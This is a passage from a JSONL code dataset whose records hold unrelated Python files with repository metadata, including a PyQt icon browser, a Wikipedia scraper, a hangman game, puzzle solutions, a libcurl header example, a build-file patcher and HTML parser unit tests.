\")\r\nprint(\"\"\"\r\n\r\n\r\n\"\"\")\r\n\r\n\r\n\r\n","repo_name":"varchous/Octopoda","sub_path":"cgi-bin/videoquery.py","file_name":"videoquery.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33347130038","text":"import logging\nimport os\nimport sys\n\nfrom PyQt5 import QtGui, QtWidgets, QtCore\n\nlogger = logging.getLogger(__name__)\n\nQG = QtGui\nQW = QtWidgets\nQC = QtCore\n\ncatalogue_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),'icons_catalogue')\n\nclass Icon(QG.QIcon):\n\tdef __init__(self,fileName,*args,**kwargs):\n\t\tpath = os.path.join(catalogue_dir,fileName)\n\t\tsuper(Icon,self).__init__(path,*args,**kwargs)\n\nclass Browser(QW.QListView):\n\tdef __init__(self,*args,**kwargs):\n\t\tsuper(Browser,self).__init__(*args,**kwargs)\n\t\tself.model = QG.QStandardItemModel()\n\n\t\tself.setViewMode(QW.QListView.IconMode)\n\t\tself.setModel(self.model)\n\n\t\tself.setGridSize(QC.QSize(64,64))\n\t\tself.setFlow(QW.QListView.LeftToRight)\n\t\tself.setResizeMode(QW.QListView.Adjust)\n\n\t\tself.buildModel()\n\n\tdef buildModel(self):\n\t\tfor f in sorted(os.listdir(catalogue_dir)):\n\t\t\tif f.split('.')[-1].upper() == 'SVG':\n\t\t\t\titem = QtGui.QStandardItem()\n\t\t\t\titem.setIcon(Icon(f))\n\t\t\t\titem.setText(f)\n\n\t\t\t\tself.model.appendRow(item)\n\nif __name__ == \"__main__\":\n\tapp = QW.QApplication([])\n\tbrowser = Browser()\n\tbrowser.show()\n\n\tsys.exit(app.exec_())","repo_name":"nanoMFG/GSAMain","sub_path":"src/gresq/util/icons.py","file_name":"icons.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"15581926119","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport pandas as pd\n\nurl = 'https://en.wikipedia.org/wiki/List_of_S%26P_500_companies'\ndata = requests.get(url)\nif str(data)=='':\n print(\"The web page is loaded successfully\")\n#load data into soup variable\nsoup = BeautifulSoup(data.text, 'html.parser')\n\n#find table and table data\ntable_1 = soup.find('table', {'class':\"wikitable sortable\",'id':\"constituents\"})\ntablebody = table_1.find('tbody')\nssp=[]\nfor i,row in enumerate(tablebody.find_all('tr')):\n if i==0:\n th = row.find_all('th')\n title = [i.text.strip() for i in th]\n else:\n td = row.find_all('td')\n table_row = [i.text.strip() for i in td]\n ssp.append(table_row)\nssp=ssp[::-1]\n\ndf = pd.DataFrame.from_records(ssp)\ndf.columns=title\ndf\n\n##\n#second table\ntable_2 = soup.find('table', {'class':\"wikitable sortable\",'id':'changes'})\ntablebody = table_2.find('tbody')\n\n\nssp2=[]\nfor i,row in enumerate(tablebody.find_all('tr')):\n if i>1:\n td = row.find_all('td')\n table_row = [re.split('.\\d+.\\n', i.text)[0] for i in td]\n ssp2.append(table_row)\nssp2=ssp2[::-1]\n\n##\ndf2 = pd.DataFrame.from_records(ssp2)\ndf2.columns = ['Date', 'Added Ticker', 'Added Security','Removed Ticker ', 'Removed Security', 'Reason']\ndf2\n##\nData_Frames=pd.read_html('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\nData_Frames[0]\n##\nData_Frames[1]\n","repo_name":"SajjadKia/ApiRegex","sub_path":"wikitable.py","file_name":"wikitable.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10019775524","text":"# Bibliotheken laden\nfrom machine import Pin, I2C\nimport struct\nimport utime as time\n\nenable_Pin = machine.Pin(16, machine.Pin.OUT, value=0)\n\nfrom I2C.i2c_caen import A7585\n\nDEV_A = A7585(112,20,21)\nDEV_A.startup(80,10,30,2,rampuptime=2)\n\nenable_Pin.value(1)\nDEV_A.SetEnable(True)\n\nprint(\"Setup Done\")\n\ntime.sleep(1)\n\ndef check_I2C():\n Vout = DEV_A.GetVout()\n statusHV = DEV_A.GetHVOn()\n conectionHV = DEV_A.GetConnectionStatus()\n print(\"V:\",Vout,\"HV:\",statusHV,\"Connectivity:\",conectionHV)\n\nwhile True:\n print(DEV_A.GetRampVs())\n print(DEV_A.GetMaxV())\n time.sleep(1.5)\n \n \n\n\n\n","repo_name":"molztim/I2C-A7585D-PicoW","sub_path":"class_test.py","file_name":"class_test.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41433065597","text":"import random\r\nfrom words import words\r\nimport string\r\n\r\n\r\ndef get_word(words):\r\n guess_word = random.choice(words)\r\n return guess_word.upper()\r\n\r\n\r\ndef name_game():\r\n secrete = get_word(words)\r\n secrete_letters = set(secrete)\r\n alphabet = set(string.ascii_uppercase)\r\n typed_letters = set()\r\n lives = (len(secrete_letters) * 2)\r\n\r\n print(\"NAME OF ANIMAL\")\r\n print(\"\")\r\n print(\"You have\", lives, \"tries\")\r\n\r\n while len(secrete_letters) > 0 and lives != 0:\r\n\r\n print(\"\")\r\n wordlist = [letter if letter in typed_letters else \"_\" for letter in secrete]\r\n print(\"Your current word is: \", \" \".join(wordlist))\r\n guess = input(\"Enter a letter: \").upper()\r\n\r\n if guess in alphabet - typed_letters:\r\n typed_letters.add(guess)\r\n if guess in secrete_letters:\r\n secrete_letters.remove(guess)\r\n else:\r\n print(guess, \"is not in the word.\")\r\n lives -= 1\r\n print(\"\")\r\n if lives > 1:\r\n print(\"You have\", lives, \"lives left\")\r\n else:\r\n print(\"You have\", lives, \"live left\")\r\n elif guess in typed_letters:\r\n print(\"You have used this letter\")\r\n else:\r\n print(\"Invalid Input\")\r\n\r\n print(\"you have used letter: \", \",\".join(typed_letters))\r\n\r\n if lives == 0:\r\n print(\"\")\r\n print(\"You lost, the animal name is\", secrete)\r\n else:\r\n print(\"\")\r\n print(\"You WON!!!\")\r\n print(f\"You guessed the animal {secrete} correctly.\")\r\n\r\n\r\nname_game()\r\n","repo_name":"Abasir04/Python","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8232343026","text":"import sys\nimport ctypes as ct\n\nimport libcurl as lcurl\nfrom curltestutils import * # noqa\n\n\ndef main(argv=sys.argv[1:]):\n\n url: str = argv[0] if len(argv) >= 1 else \"localhost\"\n\n curl: ct.POINTER(lcurl.CURL) = lcurl.easy_init()\n\n with curl_guard(False, curl):\n if not curl: return 1\n\n chunk = ct.POINTER(lcurl.slist)()\n # Remove a header curl would otherwise add by itself\n chunk = lcurl.slist_append(chunk, b\"Accept:\")\n # Add a custom header\n chunk = lcurl.slist_append(chunk, b\"Another: yes\")\n # Modify a header curl otherwise adds differently\n chunk = lcurl.slist_append(chunk, b\"Host: example.com\")\n # Add a header with \"blank\" contents to the right of the colon.\n # Note that we are then using a semicolon in the string we pass to curl!\n chunk = lcurl.slist_append(chunk, b\"X-silly-header;\")\n # set our custom set of headers\n lcurl.easy_setopt(curl, lcurl.CURLOPT_HTTPHEADER, chunk)\n lcurl.easy_setopt(curl, lcurl.CURLOPT_URL, url.encode(\"utf-8\"))\n lcurl.easy_setopt(curl, lcurl.CURLOPT_VERBOSE, 1)\n\n # Perform the custom request\n res: int = lcurl.easy_perform(curl)\n\n # Check for errors\n if res != lcurl.CURLE_OK:\n handle_easy_perform_error(res)\n\n # free the custom headers\n lcurl.slist_free_all(chunk)\n\n return 0\n\n\nsys.exit(main())\n","repo_name":"karpierz/libcurl","sub_path":"examples/httpcustomheader.py","file_name":"httpcustomheader.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"42960256605","text":"# эта программа нужна для генерации случайной статьи с Диалога\r\n# она открывает json \"номер\" : \"автор и название\"\r\n# ��алее генерирует номер и берет из json-а автора и название по этому номеру\r\n\r\nimport json\r\nfrom random import randint # randint(a, b) генерирует число N такое, что a <= N <= b\r\n\r\nwith open('authors_and_titles_result.json', encoding='utf-8') as file:\r\n at = json.load(file) # сюда выгружаем авторов и названия\r\n\r\nr = randint(1, 326) # сгенерировали число r такое, что 1 <= r <= 326\r\nresult = at[str(r)] # по этому номеру вытащили автора и название\r\nprint('Советуем почитать следующую статью:', result)\r\n","repo_name":"fleur-roar/project-Dialogue-articles","sub_path":"random_article.py","file_name":"random_article.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27444253153","text":"from collections import deque\nwith open(0) as f:\n\tcontent = f.read().strip()\n\tlines = content.splitlines()\n\t# lines.append(\"\")\n\n\nrocks_str = \"\"\"####\n\n.#.\n###\n.#.\n\n..#\n..#\n###\n\n#\n#\n#\n#\n\n##\n##\n\n\"\"\"\n\nrocks = []\ncurrent = []\nfor line in rocks_str.splitlines():\n\tif line in {\"\", \"\\n\"}:\n\t\trocks.append(current)\n\t\tcurrent = []\n\telse:\n\t\tcurrent.append(list(line))\n\nfrom collections import defaultdict\ngrid = defaultdict(lambda: '.')\ndef can_move(coords, symbol):\n\tdx = (-1 if symbol == \"<\" else 1) if symbol in \"<>\" else 0\n\tdy = -1 if symbol == \"down\" else 0\n\tfor i, coord in enumerate(coords):\n\t\tx,y = coord\n\t\tgrid[(x,y)] = '.'\n\tposs = True\n\tfor x, y in coords:\n\t\tif not (0<= x + dx < 7 and 0<= y + dy and grid[(x+dx,y+dy)] == '.'):\n\t\t\tposs = False\n\t\t\tbreak\n\tfor i, coord in enumerate(coords):\n\t\tx,y = coord\n\t\tgrid[(x,y)] = '#'\n\treturn poss\n\t\ndef move(coords, symbol):\n\tdx = (-1 if symbol == \"<\" else 1) if symbol in \"<>\" else 0\n\tdy = -1 if symbol == \"down\" else 0\n\tfor i, coord in enumerate(coords):\n\t\tx,y = coord\n\t\tgrid[(x,y)] = '.'\n\tfor i, coord in enumerate(coords):\n\t\tx,y = coord\n\t\tx += dx\n\t\ty += dy\n\t\tgrid[(x,y)] = '#'\n\t\tcoords[i] = (x,y)\n\nhighest = -1\n\ndef create_new_grid():\n\tdeepest = highest\n\tfor i in range(7):\n\t\tj = highest\n\t\twhile j >= 0:\n\t\t\tdeepest = min(deepest, j)\n\t\t\tif grid.get((i,j)) == \"#\":\n\t\t\t\tbreak\n\t\t\tj -= 1\n\tsubgrid = defaultdict(lambda: '.')\n\tfor i in range(7):\n\t\tfor j in range(highest, deepest-1,-1):\n\t\t\tres = grid.get((i,j))\n\t\t\tif res == \"#\":\n\t\t\t\tsubgrid[(i,j)] = \"#\"\n\treturn subgrid\nnb = 1514285714288 *10\n\ndef to_string():\n\t# l = []\n\ts = \"\"\n\tfor j in range(highest, highest-5, -1):\n\t\tfor i in range(7):\n\t\t\ts += grid[(i,j)]\n\t\t# l.append(s)\n\treturn s\n\ndef display():\n\tfor jj in range(highest, -1,-1):\n\t\ts = \"\"\n\t\tfor ii in range(0, 7):\n\t\t\ts += grid.get((ii,jj), '.')\n\t\tprint(s)\n\tprint()\nj = 0\n\npattern = {}\nres = []\nfor i in (range(100000)):\n\tcoords = []\n\tcx = 2\n\tcy = highest + 3 + len(rocks[i%len(rocks)])\n\tprev_highest = highest\n\thighest = cy\n\tprev_j = j\n\tfor l in rocks[i%len(rocks)]:\n\t\tcx = 2\n\t\tfor ch in l:\n\t\t\tif ch == \"#\":\n\t\t\t\tgrid[(cx,cy)] = \"#\"\n\t\t\t\tcoords.append((cx,cy))\n\t\t\tcx += 1\n\t\tcy -= 1\n\n\twhile True:\n\t\tmoved = False\n\t\tif can_move(coords, content[j%len(content)]):\n\t\t\tmove(coords, content[j%len(content)])\n\t\t\tmoved = True\n\t\tj += 1\n\t\tif can_move(coords, \"down\"):\n\t\t\tmove(coords, \"down\")\n\t\t\thighest -= 1\n\t\telse: \n\t\t\tbreak\n\thighest = max(highest, prev_highest)\n\tres.append(highest)\n\tif highest < 5:\n\t\tcontinue\n\tif (to_string(), j%len(content), i%len(rocks)) in pattern:\n\t\tpattern[(to_string(), j%len(content), i%len(rocks))].append((highest, i))\n\t\tif len(pattern[(to_string(), j%len(content), i%len(rocks))]) >= 3:\n\t\t\tps = pattern[(to_string(), j%len(content), i%len(rocks))]\n\t\t\theigh = ps[1][0] - ps[0][0]\n\t\t\tc_l = ps[1][1] - ps[0][1]\n\t\t\tprint(heigh, c_l)\n\t\t\tans = ((1000000000000 - ps[0][1]) // c_l)*heigh + res[ps[0][1] + (1000000000000 - ps[0][1]) % c_l]\n\t\t\tprint(ans)\n\t\t\t# print(j%len(content), i%len(rocks), pattern[(to_string(), j%len(content), i%len(rocks))],i)\n\t\t\tbreak\n\telse:\n\t\tpattern[(to_string(), j%len(content), i%len(rocks))] = [(highest, i)]\n\t\nprint(highest+1)\n","repo_name":"allEyezOnCode/adventofcode","sub_path":"2022/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70204287235","text":"from collections import Counter\nclass Solution:\n def largestPalindromic(self, num: str) -> str:\n num = list(num)\n a = [0,0,0,0,0,0,0,0,0,0]\n c = Counter(num)\n ans=''\n for key,value in c.items():\n a[int(key)]=value\n for i in range(len(a)-1,-1,-1):\n ans+=str(i)*(a[i]//2)\n a[i]%=2\n flag=0\n for i in range(len(a)-1,-1,-1):\n if a[i]==1:\n ans+=str(i)\n flag=1\n break\n ans+=ans[-1-flag::-1]\n ans = ans.strip('0')\n if ans=='':\n ans = max(num)\n return ans\na = Solution()\nprint(a.largestPalindromic(num = \"6006\"))","repo_name":"z369437558/Leetcode","sub_path":"2384.py","file_name":"2384.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18548953145","text":"# COMP9021 19T3 - Rachid Hamadi\n# Sample Exam 2\n\n\n'''\nTries and find a word in a text file that represents a grid of words, all of the same length.\nThere is only one word per line in the file.\nThe letters that make up a word can possibly be separated by an arbitrary number of spaces,\nand there can also be spaces at the beginning or at the end of a word,\nand there can be lines consisting of nothing but spaces anywhere in the file.\nAssume that the file stores data as expected.\n\nA word can be read horizontally from left to right,\nor vertically from top to bottom,\nor diagonally from top left to bottom right\n(this is more limited than the lab exercise).\nThe locations are represented as a pair (line number, column number),\nstarting the numbering with 1 (not 0).\n'''\n\n\ndef find_word(filename, word):\n '''\n >>> find_word('word_search_1.txt', 'PLATINUM')\n PLATINUM was found horizontally (left to right) at position (10, 4)\n >>> find_word('word_search_1.txt', 'MANGANESE')\n MANGANESE was found horizontally (left to right) at position (11, 4)\n >>> find_word('word_search_1.txt', 'LITHIUM')\n LITHIUM was found vertically (top to bottom) at position (2, 14)\n >>> find_word('word_search_1.txt', 'SILVER')\n SILVER was found vertically (top to bottom) at position (2, 13)\n >>> find_word('word_search_1.txt', 'SODIUM')\n SODIUM was not found\n >>> find_word('word_search_1.txt', 'TITANIUM')\n TITANIUM was not found\n >>> find_word('word_search_2.txt', 'PAPAYA')\n PAPAYA was found diagonally (top left to bottom right) at position (1, 9)\n >>> find_word('word_search_2.txt', 'RASPBERRY')\n RASPBERRY was found vertically (top to bottom) at position (5, 14)\n >>> find_word('word_search_2.txt', 'BLUEBERRY')\n BLUEBERRY was found horizontally (left to right) at position (13, 5)\n >>> find_word('word_search_2.txt', 'LEMON')\n LEMON was not found\n '''\n with open(filename) as file:\n #grid = None\n # Insert your code here\n # A one liner that sets grid to the appropriate value is enough.\n grid = []\n i = 0\n for line in file:\n if line.split() == []:\n continue\n grid.append([])\n for e in line:\n if e.isalpha() == True:\n grid[i].append(e)\n i += 1\n #print(grid)\n location = find_word_horizontally(grid, word)\n found = False\n if location:\n found = True\n print(word, 'was found horizontally (left to right) at position', location)\n location = find_word_vertically(grid, word)\n if location:\n found = True\n print(word, 'was found vertically (top to bottom) at position', location)\n location = find_word_diagonally(grid, word)\n if location:\n found = True\n print(word, 'was found diagonally (top left to bottom right) at position', location)\n if not found:\n print(word, 'was not found')\n \n \ndef find_word_horizontally(grid, word):\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == word[0]:\n start_point = (i+1,j+1)\n k = 0\n while j+k>> [{id}] {test}')\n assert calc.sum(*numbers) == result\n","repo_name":"AlexandreBartie/python-pytest-example","sub_path":"test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38056262862","text":"from argparse import ArgumentParser\nimport codecs\nimport re\nimport functools\nimport os\nimport sys\n\n\ndef patch_file(filename):\n def decorator(fn):\n @functools.wraps(fn)\n def wrapper(self):\n if self.filename.endswith(filename):\n self.read()\n temp = self.content\n fn(self)\n if temp != self.content:\n print(f\"patched {self.filename}\")\n self.dirty = True\n\n wrapper._targetable = True\n return wrapper\n\n return decorator\n\n\nclass File(object):\n def __init__(self, filename):\n if not os.path.exists(filename):\n raise Exception(\n f\"The file at '{filename}' could not be found, did you supply an incorrect root directory?\"\n )\n self.filename = filename\n self.is_read = False\n self.dirty = False\n self.content = \"\"\n try:\n self.obj = open(self.filename, \"r+\")\n except:\n self.obj = []\n pass\n\n def patch(self):\n for key, value in self.__class__.__dict__.items():\n if getattr(value, \"_targetable\", False):\n getattr(self, key)()\n\n def __del__(self):\n if self.dirty:\n self.obj.write(self.content)\n self.obj.truncate()\n self.obj.close()\n\n def read(self):\n try:\n if not self.is_read:\n self.content = self.obj.read()\n self.obj.seek(0)\n self.is_read = True\n except:\n pass\n\n @patch_file(\"include/vulkan/vulkan.h\")\n def patch_vulkan(self):\n self.content = re.sub(\n \"^#include $\",\n r\"\"\"typedef unsigned long DWORD;\\n\"\"\"\n r\"\"\"typedef const wchar_t* LPCWSTR;\\n\"\"\"\n r\"\"\"typedef void* HANDLE;\\n\"\"\"\n r\"\"\"typedef struct HINSTANCE__* HINSTANCE;\\n\"\"\"\n r\"\"\"typedef struct HWND__* HWND;\\n\"\"\"\n r\"\"\"typedef struct HMONITOR__* HMONITOR;\\n\"\"\"\n r\"\"\"typedef struct _SECURITY_ATTRIBUTES SECURITY_ATTRIBUTES;\"\"\",\n self.content,\n flags=re.M,\n )\n\n @patch_file(\"core/core.vcxproj\")\n def patch_msvc(self):\n self.content = re.sub(\n r\".*\",\n r\"$(IntDir)%(Directory)\",\n self.content,\n )\n\n\ndef patch(root):\n patch_includes(root)\n patch_msvc(root)\n\n\ndef patch_includes(root):\n root = root.replace(\"\\\\\", \"/\") + \"/_deps/\"\n files = []\n\n for r, d, f in os.walk(root):\n for file in f:\n files.append(os.path.join(r, file))\n\n for f in files:\n fObj = File(f.replace(\"\\\\\", \"/\"))\n fObj.patch()\n\n\ndef patch_msvc(root):\n root = root.replace(\"\\\\\", \"/\")\n\n if os.path.isfile(os.path.join(root, \"core/core.vcxproj\")):\n fObj = File(os.path.join(root, \"core/core.vcxproj\"))\n elif os.path.isfile(os.path.join(root, \"paradigm/core/core.vcxproj\")):\n fObj = File(os.path.join(root, \"paradigm/core/core.vcxproj\"))\n else:\n raise Exception(\n f\"No project files found at path '{root}', did you supply the correct path?\"\n )\n fObj.patch()\n\n\ndef patch_utf8(folders):\n for folder in folders:\n for r, d, f in os.walk(folder):\n for file in f:\n try:\n BUFSIZE = 4096\n BOMLEN = len(codecs.BOM_UTF8)\n\n with open(os.path.join(r, file), \"r+b\") as fp:\n chunk = fp.read(BUFSIZE)\n if chunk.startswith(codecs.BOM_UTF8):\n i = 0\n chunk = chunk[BOMLEN:]\n while chunk:\n fp.seek(i)\n fp.write(chunk)\n i += len(chunk)\n fp.seek(BOMLEN, os.SEEK_CUR)\n chunk = fp.read(BUFSIZE)\n fp.seek(-BOMLEN, os.SEEK_CUR)\n fp.truncate()\n except:\n continue\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"Patch project files.\")\n parser.add_argument(\n \"--project\",\n help=\"Override for the project files directory, this is relative to the root\",\n )\n parser.add_argument(\n \"--utf8\",\n nargs=\"+\",\n help=\"Override for the project files directory, this is relative to the root\",\n )\n args = parser.parse_args()\n\n if args.project:\n patch(args.project)\n if args.utf8:\n patch_utf8(args.utf8)\n","repo_name":"JessyDL/paradigm","sub_path":"tools/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"70503078916","text":"#!/usr/bin/env python3\n\nimport unittest\nimport codecs\nimport os.path\nimport xml.etree.ElementTree as ET\nimport mechanize_mini\nimport warnings\n\nclass XmlEquivTest(unittest.TestCase):\n def assertHtmlEqualsXml(self, html, xml, *, strict_whitespace=True):\n htree = mechanize_mini.parsehtmlstr(html)\n xtree = ET.fromstring(xml)\n\n if not strict_whitespace:\n # strip all texts in both trees\n for el in xtree.iter():\n el.text = str(el.text or '').strip()\n el.tail = str(el.tail or '').strip()\n for el in htree.iter():\n el.text = str(el.text or '').strip()\n el.tail = str(el.tail or '').strip()\n\n self.assertEqual(htree.outer_xml,\n ET.tostring(xtree, encoding='unicode'))\n\n def assertHtmlEqualsXmlFragment(self, html, xml, *, strict_whitespace=True):\n htree = mechanize_mini.parsefragmentstr(html)\n xtree = ET.ElementTree(ET.fromstring(xml))\n\n if not strict_whitespace:\n # strip all texts in both trees\n for el in xtree.iter():\n el.text = str(el.text or '').strip()\n el.tail = str(el.tail or '').strip()\n for el in htree.iter():\n el.text = str(el.text or '').strip()\n el.tail = str(el.tail or '').strip()\n\n self.assertEqual(htree.outer_xml,\n ET.tostring(xtree.getroot(), encoding='unicode'))\n\nclass BasicTest(XmlEquivTest):\n def test_empty(self):\n self.assertHtmlEqualsXml('', '')\n\n def test_vanilla(self):\n self.assertHtmlEqualsXml(\n '''\n \n \n Vanilla Example\n \n \n Hello, World!\n \n ''',\n '''\n \n Vanilla Example\n \n \n Hello, World!\n \n ''')\n\n def test_implicit_html(self):\n self.assertHtmlEqualsXml('Hello, World!', 'Hello, World!')\n self.assertHtmlEqualsXml('

Hello,

World!', '

Hello,

World!

')\n\n def test_unknown_tags(self):\n self.assertHtmlEqualsXml('bar', 'bar')\n self.assertHtmlEqualsXml('blublada', 'blublada')\n\n def test_html_attrib_collapse(self):\n self.assertHtmlEqualsXml('

blablub',\n '

blablub

')\n\n def test_single_special_chars(self):\n self.assertHtmlEqualsXml('a < dumbledore < blabla', 'a < dumbledore < blabla')\n self.assertHtmlEqualsXml('a&dum', 'a&dum')\n\n def test_attribute_without_val(self):\n self.assertHtmlEqualsXmlFragment('', '')\n\n def test_fragment(self):\n self.assertHtmlEqualsXmlFragment('

bla

', '

bla

')\n\n # multiple elements -> will be returned in wrapper\n self.assertHtmlEqualsXmlFragment('

bla

blub', '

bla

blub

')\n\n # text before or after -> wrapper will be returned\n self.assertHtmlEqualsXmlFragment('

bla

blub', '

bla

blub')\n self.assertHtmlEqualsXmlFragment('blub

bla', 'blub

bla

')\n\n def test_with_bom(self):\n self.assertHtmlEqualsXmlFragment('\\uFEFF

bla

', '

bla

')\n\n # but only one bom will be removed\n self.assertHtmlEqualsXmlFragment('\\uFEFF\\uFEFF

bla

', '\\uFEFF

bla

')\n\n def test_autoclose(self):\n # list items\n self.assertHtmlEqualsXmlFragment(\n '''\n
    \n
  • bla\n
  • blub\n
  • abcdefg\n
\n ''',\n '''\n
    \n
  • bla\n
  • blub\n
  • abcdefg\n
\n ''')\n\n # tables\n self.assertHtmlEqualsXmlFragment(\n '''\n \n \n \n \n \n \n \n \n \n
Howdy\n My friends!\n
Tables\n Can totally\n Be abused\n We don't care about geometry no way\n \n \n
\n
\n ''',\n '''\n \n \n \n \n \n \n \n \n \n
Howdy\n My friends!\n
Tables\n Can totally\n Be abused\n We don't care about geometry no way\n \\n \\n
\n
\n ''')\n\n # select items\n self.assertHtmlEqualsXmlFragment(\n '''\n \n ''',\n '''\n \n ''')\n\nclass ParagraphWeirdness(XmlEquivTest):\n def test_nested_paragraph(self):\n self.assertHtmlEqualsXml('

a

b

c

', '

a

b

c

')\n\n def test_paragraph_in_header(self):\n self.assertHtmlEqualsXml('

Bla

', '

Bla

')\n\n def test_rogue_closing_tags(self):\n self.assertHtmlEqualsXml(\n '''\n

\n Bla\n

\n Yumm

ie\n
\n Bla\n

\n ''',\n '''\n \n

\n Bla\n

\n
\n Yumm\n

\n ie\n

\n Bla\n

\n ''', strict_whitespace = False)\n self.assertHtmlEqualsXmlFragment(\n '''\n

\n
    \n
  • \n

    \n Some Paragraph\n

  • \n

    \n \n
\n \n \n ''',\n '''\n
\n
    \n
  • \n

    \n Some Paragraph\n

    \n
  • \n

    \n

\n
\n ''', strict_whitespace = False)\n self.assertHtmlEqualsXmlFragment(\n '''\n
\n
    \n
  • \n

    \n Some Paragraph\n

  • \n

    \n
\n
\n \n \n ''',\n '''\n
\n
    \n
  • \n

    \n Some Paragraph\n

    \n
  • \n

    \n

\n
\n ''', strict_whitespace = False)\n self.assertHtmlEqualsXml(\n '''\n \n \n
\n

\n Bla\n \n
\n
\n

\n

\n Blub\n \n \n ''', '''\n \n \n
\n

\n Bla\n \n
\n
\n

\n

\n Blub\\n \\n \\n ''')\n\n\n def test_sequence_methods(self):\n content = mechanize_mini.parsefragmentstr('

  • a
  • b
  • c')\n self.assertEqual(content.outer_html, '
    • a
    • b
    • c
    ')\n\n content[0] = mechanize_mini.parsefragmentstr('
  • d')\n self.assertEqual(content.outer_html, '
    • d
    • b
    • c
    ')\n\n del content[2]\n self.assertEqual(content.outer_html, '
    • d
    • b
    ')\n\n def test_repr(self):\n content = mechanize_mini.parsefragmentstr('
    • a
    • b
    • c')\n\n self.assertEqual(repr(content), ''.format(id(content)))\n\nclass TestFormatMisnesting(XmlEquivTest):\n def test_correct(self):\n self.assertHtmlEqualsXml('a
      b
      c
      ', 'a
      b
      c
      ')\n\n def test_easy(self):\n self.assertHtmlEqualsXml('abc', 'abc')\n\n def test_stray_endtags(self):\n self.assertHtmlEqualsXmlFragment('

      blablub

      ', '

      blablub

      ')\n\n def test_evil1(self):\n self.assertHtmlEqualsXml('a
      bc
      de
      f
      ',\n 'a
      bc
      de
      f
      ')\n\n def test_evil2(self):\n self.assertHtmlEqualsXml('

      bla
      blublala
      ',\n '

      bla
      blublala
      ')\n\n def test_for_coverage(self):\n self.assertHtmlEqualsXmlFragment('
      bla
      ', '
      bla
      ')\n\nclass TestCharsetDetection(XmlEquivTest):\n def assertCodecEqual(self, a, b):\n self.assertEqual(codecs.lookup(a).name, codecs.lookup(b).name)\n\n def assertHtmlEqualsXml(self, html, xml, charset=None):\n htree = mechanize_mini.parsehtmlbytes(html, charset)\n xtree = ET.fromstring(xml)\n\n # prune empty text nodes from xml\n for el in xtree.iter():\n if str(el.text).strip() == '':\n el.text = None\n if str(el.tail).strip() == '':\n el.tail = None\n\n self.assertEqual(htree.outer_xml,\n ET.tostring(xtree, encoding='unicode'))\n\n def test_default(self):\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'cp1252')\n\n # yes, even if utf-8 characters are inside we still default to cp1252\n self.assertCodecEqual(mechanize_mini.detect_charset('blabläáßð«»'.encode('utf8')), 'cp1252')\n\n def test_xml_declaration(self):\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'utf8')\n\n # but meta tag overrides it\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'iso-8859-15')\n\n def test_bom(self):\n # various utf trickeries\n\n self.assertCodecEqual(mechanize_mini.detect_charset('\\uFEFFblöáðäü'.encode('utf-16-le')), 'utf-16-le')\n self.assertCodecEqual(mechanize_mini.detect_charset('\\uFEFFblöáðäü'.encode('utf-16-be')), 'utf-16-be')\n self.assertCodecEqual(mechanize_mini.detect_charset('\\uFEFFblöáðäü'.encode('utf8')), 'utf_8')\n\n # BOM overrides anything else\n self.assertCodecEqual(mechanize_mini.detect_charset(codecs.BOM_UTF8 + b''), 'utf_8')\n\n def test_meta(self):\n\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'cp1252')\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'utf-8')\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'cp1252')\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'utf-8')\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'utf-8')\n\n # multiple meta tags -> only first valid one is evaluated\n self.assertCodecEqual(mechanize_mini.detect_charset(b'blabla'), 'cp1252')\n self.assertCodecEqual(mechanize_mini.detect_charset(b'blabla'), 'utf-8')\n\n # meta content without charset -> cp1252\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'cp1252')\n\n # meta in ASCII test with UTF-16 -> gets turned into UTF-8\n self.assertCodecEqual(mechanize_mini.detect_charset(b'blabla'), 'utf-8')\n\n def test_garbage(self):\n # garbage charset -> default win1252\n\n self.assertCodecEqual(mechanize_mini.detect_charset(b''), 'cp1252')\n\n self.assertCodecEqual(mechanize_mini.detect_charset(b'blabla', 'lutscher'), 'cp1252')\n\n def test_override(self):\n self.assertCodecEqual(mechanize_mini.detect_charset(b'bla', 'utf-8'), 'utf-8')\n self.assertCodecEqual(mechanize_mini.detect_charset(b'bla', 'ASCII'), 'cp1252')\n 